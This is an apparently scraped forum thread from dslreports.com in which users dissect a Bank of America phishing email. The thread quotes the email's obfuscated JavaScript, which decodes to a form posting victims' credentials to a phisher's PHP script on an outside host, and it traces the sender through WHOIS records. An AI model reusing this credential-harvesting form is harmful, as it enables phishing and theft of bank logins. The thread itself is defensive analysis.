Topic '[Phish] Curious BofA phish - manual input found no URLs' in forum 'Scam and Phishbusters' - dslreports.com http://www.dslreports.com/forum/Phish-Curious-BofA-phish-manual-input-found-no-URLs-22671429 en Sat, 11 Feb 2012 13:51:43 EDT Sat, 11 Feb 2012 13:51:43 EDT Re: [Phish] Curious BofA phish - manual input found no URLs http://www.dslreports.com/forum/Re-Phish-Curious-BofA-phish-manual-input-found-no-URLs-22672947 https://onlineeast.bankofamerica.com/cgi-bin/ias/4KT s2fjNOSVa4JgTQE9WI4BvbjhaFHngFjech7og29088/1/bofa/ibd/IAS/presentation/GotoResetPasscodeWithPinPage

[att=1]

As nwrickert See Profile noted, the submit button will activate a php script demo.php located at >http://jajo-raq.signet.nl/libImage/demo.php which will process the victim's data, generally by emailing it to the phisher, or storing it in a local file.

The unescaped javascript:

<body><SCRIPT LANGUAGE='JavaScript'><!-- hp_d00(unescape("%3C%66%6F%72%6D%20%6D%65%74%68%6F%64%3D%22%50%4F%53%54%22%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%6A%61%6A%6F%2D%72%61%71%2E%73%69%67%6E%65%74%2E%6E%6C%2F%6C%69%62%49%6D%61%67%65%2F%64%65%6D%6F%2E%70%68%70%22%3E"));//--></SCRIPT>

Decodes to:

(">form method="POST" action=">http://jajo-raq.signet.nl/libImage/demo.php">

jajo-raq.signet.nl: »jajo-raq.signet.nl appears to be a home page for sites hosted in the Netherlands on signet.nl »www.signet.nl/ sending a complaint to abuse[@]signet.nl to cancel the account.

Also, the phishing email appears to have originated from a compromised IP 198.60.105.201 in Colorado.

NetRange: 198.60.105.0 - 198.60.105.255
CIDR: 198.60.105.0/24
NetName: ZENEZ
NetHandle: NET-198-60-105-0-1
Parent: NET-198-59-0-0-1
NetType: Reassigned
Comment:
RegDate: 1994-10-21
Updated: 1994-10-21

RTechHandle: BLG-ARIN
RTechName: Gerber, Boyd Lynn
RTechPhone: +1-801-250-0795
RTechEmail:

OrgTechHandle: BLG-ARIN
OrgTechName: Gerber, Boyd Lynn
OrgTechPhone: +1-801-250-0795
OrgTechEmail: gerberb[@]zenez.com

And was relayed via a compromised email account on a server in Spain belonging to lontana-sureste.com

MGD
Click for full size
]]> http://www.dslreports.com/forum/Re-Phish-Curious-BofA-phish-manual-input-found-no-URLs-22672947 Wed, 08 Jul 2009 11:35:14 EDT Re: [Phish] Curious BofA phish - manual input found no URLs http://www.dslreports.com/forum/Re-Phish-Curious-BofA-phish-manual-input-found-no-URLs-22671774
I saved just the local part into a local file with name "x.html". Then I browsed to that file with firefox.

The page displayed contains a form for submitting credentials. The form is part of the email text, not from an external phishing site. According to firefox, the completed form is to be posted to
http://jajo-raq.signet.nl/libImage/demo.php

When I try that link (browsing to that link), I am redirected to a real BofA web site.

I did not try submitting to phishtracker, since there was no visible link. If I really wanted to submit, I would have to modify the message to add a line containing that link. It's probably not worth the trouble since the details are in this thread.
--
AT&T dsl; Speedstream 5100b modem; Zyxel NBG334W router; openSuSE 11.0; firefox 3.0.11]]> http://www.dslreports.com/forum/Re-Phish-Curious-BofA-phish-manual-input-found-no-URLs-22671774 Wed, 08 Jul 2009 08:11:07 EDT [Phish] Curious BofA phish - manual input found no URLs http://www.dslreports.com/forum/Phish-Curious-BofA-phish-manual-input-found-no-URLs-22671429
I have posted the entire email as a text file for anyone who can parse it so Phishtracker will accept it.
--
"The trouble with computers, of course, is that they are very sophisticated idiots." - Doctor Who (from Robot)
BofA Phish.txt 54,705 bytes
]]> http://www.dslreports.com/forum/Phish-Curious-BofA-phish-manual-input-found-no-URLs-22671429 Wed, 08 Jul 2009 02:53:28 EDT